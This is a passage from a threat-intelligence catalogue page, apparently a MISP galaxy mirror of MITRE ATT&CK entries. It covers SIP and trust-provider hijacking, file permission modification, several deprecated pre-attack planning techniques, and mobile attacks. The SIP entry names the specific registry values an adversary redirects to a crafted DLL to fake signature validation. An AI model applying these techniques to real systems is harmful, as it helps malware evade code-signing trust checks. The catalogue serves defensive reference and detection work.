that point to the dynamic link library (DLL) providing a SIP’s CryptSIPDllGetSignedDataMsg function, which retrieves an encoded digital certificate from a signed file. By pointing to a maliciously-crafted DLL with an exported function that always returns a known good signature value (ex: a Microsoft signature for Portable Executables) rather than the file’s real signature, an adversary can apply an acceptable signature value to all files using that SIP (Citation: GitHub SIP POC Sept 2017) (although a hash mismatch will likely occur, invalidating the signature, since the hash returned by the function will not match the value computed from the file). - Modifying the
Dll
andFuncName
Registry values inHKLM\SOFTWARE[WOW6432Node]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData{SIP_GUID}
that point to the DLL providing a SIP’s CryptSIPDllVerifyIndirectData function, which validates a file’s computed hash against the signed hash value. By pointing to a maliciously-crafted DLL with an exported function that always returns TRUE (indicating that the validation was successful), an adversary can successfully validate any file (with a legitimate signature) using that SIP (Citation: GitHub SIP POC Sept 2017) (with or without hijacking the previously mentioned CryptSIPDllGetSignedDataMsg function). This Registry value could also be redirected to a suitable exported function from an already present DLL, avoiding the requirement to drop and execute a new file on disk. - Modifying the
DLL
andFunction
Registry values inHKLM\SOFTWARE[WOW6432Node]Microsoft\Cryptography\Providers\Trust\FinalPolicy{trust provider GUID}
that point to the DLL providing a trust provider’s FinalPolicy function, which is where the decoded and parsed signature is checked and the majority of trust decisions are made. Similar to hijacking SIP’s CryptSIPDllVerifyIndirectData function, this value can be redirected to a suitable exported function from an already present DLL or a maliciously-crafted DLL (though the implementation of a trust provider is complex). - Note: The above hijacks are also possible without modifying the Registry via DLL Search Order Hijacking.
Hijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. (Citation: SpectorOps Subverting Trust Sept 2017)
Internal MISP references
UUID 72b5ef57-325c-411b-93ca-a3ca6fa17e31
which can be used as unique global reference for SIP and Trust Provider Hijacking - T1198
in MISP communities and other software using the MISP galaxy
External references
- http://www.entrust.net/knowledge-base/technote.cfm?tn=8165 - webarchive
- https://attack.mitre.org/techniques/T1198 - webarchive
- https://blogs.technet.microsoft.com/eduardonavarro/2008/07/11/sips-subject-interface-package-and-authenticode/ - webarchive
- https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/dd941614(v=ws.10) - webarchive
- https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn311461(v=ws.11) - webarchive
- https://docs.microsoft.com/windows-hardware/drivers/install/catalog-files - webarchive
- https://github.com/mattifestation/PoCSubjectInterfacePackage - webarchive
- https://msdn.microsoft.com/library/ms537359.aspx - webarchive
- https://msdn.microsoft.com/library/windows/desktop/aa388208.aspx - webarchive
- https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
external_id | T1198 |
kill_chain | ['attack-Windows:defense-evasion', 'attack-Windows:persistence'] |
mitre_platforms | ['Windows'] |
Related clusters
To see the related clusters, click here.
File and Directory Permissions Modification - T1222
Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Modifications may include changing specific access rights, which may require taking ownership of a file or directory and/or elevated permissions depending on the file or directory’s existing permissions. This may enable malicious activity such as modifying, replacing, or deleting specific files or directories. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via Accessibility Features, Boot or Logon Initialization Scripts, Unix Shell Configuration Modification, or tainting/hijacking other instrumental binary/configuration files via Hijack Execution Flow.
Adversaries may also change permissions of symbolic links. For example, malware (particularly ransomware) may modify symbolic links and associated settings to enable access to files from local shortcuts with remote paths.(Citation: new_rust_based_ransomware)(Citation: bad_luck_blackcat)(Citation: falconoverwatch_blackcat_attack)(Citation: blackmatter_blackcat)(Citation: fsutil_behavior)
Internal MISP references
UUID 65917ae0-b854-4139-83fe-bf2441cf0196
which can be used as unique global reference for File and Directory Permissions Modification - T1222
in MISP communities and other software using the MISP galaxy
External references
- https://attack.mitre.org/techniques/T1222 - webarchive
- https://blog.talosintelligence.com/2022/03/from-blackmatter-to-blackcat-analyzing.html - webarchive
- https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-behavior - webarchive
- https://go.kaspersky.com/rs/802-IJN-240/images/TR_BlackCat_Report.pdf - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/noberus-blackcat-alphv-rust-ransomware - webarchive
- https://www.crowdstrike.com/blog/falcon-overwatch-contributes-to-blackcat-protection/ - webarchive
- https://www.eventtracker.com/tech-articles/monitoring-file-permission-changes-windows-security-log/ - webarchive
- https://www.hybrid-analysis.com/sample/22dab012c3e20e3d9291bce14a2bfc448036d3b966c6e78167f4626f5f9e38d6?environmentId=110 - webarchive
- https://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100 - webarchive
Associated metadata
Metadata key | Value |
---|---|
external_id | T1222 |
kill_chain | ['attack-Linux:defense-evasion', 'attack-Windows:defense-evasion', 'attack-macOS:defense-evasion'] |
mitre_data_sources | ['Active Directory: Active Directory Object Modification', 'Command: Command Execution', 'File: File Metadata', 'Process: Process Creation'] |
mitre_platforms | ['Linux', 'Windows', 'macOS'] |
Assess leadership areas of interest - T1224
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
Leadership assesses the areas of most interest to them and generates Key Intelligence Topics (KIT) or Key Intelligence Questions (KIQ). For example, an adversary knows from open and closed source reporting that cyber is of interest, resulting in it being a KIT. (Citation: ODNIIntegration)
Internal MISP references
UUID d3999268-740f-467e-a075-c82e2d04be62
which can be used as unique global reference for Assess leadership areas of interest - T1224
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1224 |
kill_chain | ['pre-attack:priority-definition-planning'] |
Determine 3rd party infrastructure services - T1284
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
A wide variety of cloud, virtual private services, hosting, compute, and storage solutions are available as 3rd party infrastructure services. These services could provide an adversary with another avenue of approach or compromise. (Citation: LUCKYCAT2012) (Citation: Schneier-cloud) (Citation: Computerworld-suppliers)
Internal MISP references
UUID dfa4eaf4-50d9-49de-89e9-d33f579f3e05
which can be used as unique global reference for Determine 3rd party infrastructure services - T1284
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1284 |
kill_chain | ['pre-attack:organizational-information-gathering'] |
Related clusters
To see the related clusters, click here.
Determine highest level tactical element - T1243
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
From a tactical viewpoint, an adversary could potentially have a primary and secondary level target. The primary target represents the highest level tactical element the adversary wishes to attack. For example, the corporate network within a corporation or the division within an agency. (Citation: CyberAdversaryBehavior) (Citation: JP3-60) (Citation: JP3-12R) (Citation: DoD Cyber 2015)
Internal MISP references
UUID dc7dfc9f-be1b-4e6e-a2e6-9a9bb2400ec9
which can be used as unique global reference for Determine highest level tactical element - T1243
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1243 |
kill_chain | ['pre-attack:target-selection'] |
Determine secondary level tactical element - T1244
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
The secondary level tactical element the adversary seeks to attack is the specific network or area of a network that is vulnerable to attack. Within the corporate network example, the secondary level tactical element might be a SQL server or a domain controller with a known vulnerability. (Citation: CyberAdversaryBehavior) (Citation: JP3-60) (Citation: JP3-12R) (Citation: DoD Cyber 2015)
Internal MISP references
UUID b9148981-152a-4a19-95c1-962803f5c9af
which can be used as unique global reference for Determine secondary level tactical element - T1244
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1244 |
kill_chain | ['pre-attack:target-selection'] |
Attack PC via USB Connection - T1427
With escalated privileges, an adversary could program the mobile device to impersonate USB devices such as input devices (keyboard and mouse), storage devices, and/or networking devices in order to attack a physically connected PC(Citation: Wang-ExploitingUSB)(Citation: ArsTechnica-PoisonTap) This technique has been demonstrated on Android. We are unaware of any demonstrations on iOS.
Internal MISP references
UUID a0464539-e1b7-4455-a355-12495987c300
which can be used as unique global reference for Attack PC via USB Connection - T1427
in MISP communities and other software using the MISP galaxy
External references
- http://arstechnica.com/security/2016/11/meet-poisontap-the-5-tool-that-ransacks-password-protected-computers/ - webarchive
- http://dl.acm.org/citation.cfm?id=1920314 - webarchive
- https://attack.mitre.org/techniques/T1427 - webarchive
- https://pages.nist.gov/mobile-threat-catalogue/physical-threats/PHY-2.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
external_id | T1427 |
kill_chain | ['mobile-attack-Android:lateral-movement'] |
mitre_platforms | ['Android'] |
Determine centralization of IT management - T1285
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
Determining if a "corporate" help desk exists, the degree of access and control it has, and whether there are "edge" units that may have different support processes and standards. (Citation: SANSCentratlizeManagement)
Internal MISP references
UUID a7dff5d5-99f9-4a7e-ac54-a64113c28121
which can be used as unique global reference for Determine centralization of IT management - T1285
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1285 |
kill_chain | ['pre-attack:organizational-information-gathering'] |
Determine external network trust dependencies - T1259
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
Network trusts enable communications between different networks with specific accesses and permissions. Network trusts could include the implementation of domain trusts or the use of virtual private networks (VPNs). (Citation: CuckoosEgg) (Citation: CuckoosEggWikipedia) (Citation: KGBComputerMe)
Internal MISP references
UUID a2fc93cd-e371-4755-9305-2615b6753d91
which can be used as unique global reference for Determine external network trust dependencies - T1259
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1259 |
kill_chain | ['pre-attack:technical-information-gathering'] |
Analyze organizational skillsets and deficiencies - T1297
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
Understanding organizational skillsets and deficiencies could provide insight in to weakness in defenses, or opportunities for exploitation. (Citation: FakeLinkedIn)
Internal MISP references
UUID 96eb59d1-6c46-44bb-bfcd-56be02a00d41
which can be used as unique global reference for Analyze organizational skillsets and deficiencies - T1297
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1297 |
kill_chain | ['pre-attack:people-weakness-identification'] |
Related clusters
To see the related clusters, click here.
Analyze architecture and configuration posture - T1288
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
An adversary may analyze technical scanning results to identify weaknesses in the configuration or architecture of a victim network. These weaknesses could include architectural flaws, misconfigurations, or improper security controls. (Citation: FireEyeAPT28)
Internal MISP references
UUID 87775365-2081-4b6e-99bd-48a3b8f36563
which can be used as unique global reference for Analyze architecture and configuration posture - T1288
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1288 |
kill_chain | ['pre-attack:technical-weakness-identification'] |
Analyze organizational skillsets and deficiencies - T1289
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
Analyze strengths and weaknesses of the target for potential areas of where to focus compromise efforts. (Citation: FakeLinkedIn)
Internal MISP references
UUID 092f05e3-f7c0-4cd2-91be-3a8d6ed3cadc
which can be used as unique global reference for Analyze organizational skillsets and deficiencies - T1289
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1289 |
kill_chain | ['pre-attack:technical-weakness-identification'] |
Related clusters
To see the related clusters, click here.
Leverage compromised 3rd party resources - T1375
This technique has been deprecated. Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.
The utilization of resources not owned by the adversary to launch exploits or operations. This includes utilizing equipment that was previously compromised or leveraging access gained by other methods (such as compromising an employee at a business partner location). (Citation: CitizenLabGreatCannon)
Internal MISP references
UUID 2c8a9df4-52a9-4770-94b3-5e95ab7d59f9
which can be used as unique global reference for Leverage compromised 3rd party resources - T1375
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1375 |
kill_chain | ['pre-attack:launch'] |
Procure required equipment and software - T1335
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
An adversary will require some physical hardware and software. They may only need a lightweight set-up if most of their activities will take place using on-line infrastructure. Or, they may need to build extensive infrastructure if they want to test, communicate, and control other aspects of their activities on their own systems. (Citation: NYTStuxnet)
Internal MISP references
UUID 2141aea0-cf38-49aa-9e51-ac34092bc30a
which can be used as unique global reference for Procure required equipment and software - T1335
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1335 |
kill_chain | ['pre-attack:establish-&-maintain-infrastructure'] |
SSL certificate acquisition for domain - T1337
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
Certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. Acquiring a certificate for a domain name similar to one that is expected to be trusted may allow an adversary to trick a user in to trusting the domain (e.g., vvachovia instead of Wachovia -- homoglyphs). (Citation: SubvertSSL) (Citation: PaypalScam)
Internal MISP references
UUID e34b9ca1-8778-41a3-bba5-8edaab4076dc
which can be used as unique global reference for SSL certificate acquisition for domain - T1337
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1337 |
kill_chain | ['pre-attack:establish-&-maintain-infrastructure'] |
Confirmation of launched compromise achieved - T1383
This technique has been deprecated. Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.
Upon successful compromise the adversary may implement methods for confirming success including communication to a command and control server, exfiltration of data, or a verifiable intended effect such as a publicly accessible resource being inaccessible or a web page being defaced. (Citation: FireEye Malware Stages) (Citation: APTNetworkTrafficAnalysis)
Internal MISP references
UUID f4c5d1d9-8f0e-46f1-a9fa-f9a440926046
which can be used as unique global reference for Confirmation of launched compromise achieved - T1383
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1383 |
kill_chain | ['pre-attack:compromise'] |
App Delivered via Email Attachment - T1434
The application is delivered as an email attachment.
Detection: An EMM/MDM or mobile threat protection solution can identify the presence of unwanted, known insecure, or malicious apps on devices. Enterprise email security solutions can identify the presence of Android or iOS application packages within email messages.
Platforms: Android, iOS
Internal MISP references
UUID 1f96d624-8409-4472-ad8a-30618ee6b2e2
which can be used as unique global reference for App Delivered via Email Attachment - T1434
in MISP communities and other so